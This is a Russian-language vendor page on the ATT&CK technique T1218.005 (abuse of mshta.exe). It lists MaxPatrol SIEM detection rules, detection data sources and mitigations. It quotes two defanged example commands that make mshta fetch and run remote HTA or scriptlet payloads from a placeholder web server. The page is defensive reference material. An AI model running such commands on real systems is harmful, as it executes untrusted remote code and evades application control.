MaxPatrol SIEM

Выявляет инциденты ИБ, ведущие к нарушению киберустойчивости компании

T1218.005: Утилита mshta

Злоумышленники могут использовать легитимную утилиту Windows mshta.exe для выполнения вредоносных HTA-файлов, а также JavaScript- или VBScript-кода. Существует несколько типов угроз, использующих mshta.exe на этапе начального заражения и для последующего выполнения кода.

Mshta.exe — это утилита, которая выполняет файлы Microsoft HTML Application (HTA) . HTA — это автономные приложения, работающие на основе тех же моделей и технологий, что и Internet Explorer, но вне браузера .

Mshta.exe может выполнять файлы с помощью встроенного сценария: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))

Файлы также могут выполняться напрямую по URL-адресу: mshta http[:]//webserver/payload[.]hta

Mshta.exe может использоваться для обхода механизмов контроля приложений, которые не отслеживают ее использование. Поскольку утилита mshta.exe выполняется вне контекста безопасности Internet Explorer, она также позволяет обходить настройки безопасности браузера .

Какие продукты Positive Technologies покрывают технику

Экспертиза MaxPatrol SIEM

mitre_attck_execution: PT-CR-1089: DotNetToJScript_Usage: Обнаружено возможное использование утилиты DotNetToJscript
hacking_tools: PT-CR-353: Koadic_MSHTA_Stager: Обнаружено возможное использование программного обеспечения Koadic (фреймворк Koadic предназначен для проведения пост-эксплуатации в ОС семейства Windows), которое запускает полезную нагрузку на атакуемом узле с помощью Microsoft Windows HTML Application
mitre_attck_defense_evasion: PT-CR-204: MSHTA_AWL_Bypass: Попытка обойти запрет на запуск приложений с помощью встроенной утилиты Microsoft Windows mshta.exe (используется для выполнения HTML-приложений (.hta))
mitre_attck_defense_evasion: PT-CR-650: Suspicious_File_Created_by_Legal_Process: Обнаруживает создание подозрительных файлов легитимными процессами

Способы обнаружения

IDDS0009Источник и компонент данныхПроцесс: Создание процессаОписание

Отслеживайте процессы для мониторинга запуска утилиты mshta.exe и ее аргументов.

IDDS0022Источник и компонент данныхФайл: Создание файлаОписание

Отслеживайте использование HTA-файлов. Если они обычно не используются в среде, их запуск может свидетельствовать о подозрительной активности.

IDDS0017Источник и компонент данныхКоманда: Выполнение командОписание

Отслеживайте запуск незамаскированных или обфусцированных сценариев утилитой mshta.exe через командную строку. Сопоставляйте недавние вызовы mshta.exe с историей использования известных допустимых аргументов и выполнения допустимых HTA-файлов, чтобы выявить аномальную и потенциально вредоносную активность. Рекомендуется также отслеживать аргументы, которые использовались до и после вызова mshta.exe, чтобы определить происхождение и назначение выполняемого HTA-файла.

IDDS0029Источник и компонент данныхСетевой трафик: Создание сетевого подключенияОписание

Отслеживайте создание сетевых соединений с недоверенными узлами.

Меры противодействия

IDM1038НазваниеЗащита от выполненияОписание

Используйте контроль приложений, настроенный на блокировку выполнения mshta.exe, если он не требуется для данной системы или сети, чтобы предотвратить потенциальное использование злоумышленниками. Например, в Windows 10, Windows Server 2016 и более поздних версий для блокировки приложения mshta.exe и предотвращения злоупотреблений можно применять правила политики управления приложениями в Защитнике Windows (WDAC).

IDM1042НазваниеОтключение или удаление компонента или программыОписание

Утилита Mshta.exe может быть не нужна в конкретной среде, поскольку ее функциональность связана со старыми версиями Internet Explorer, срок службы которых истек.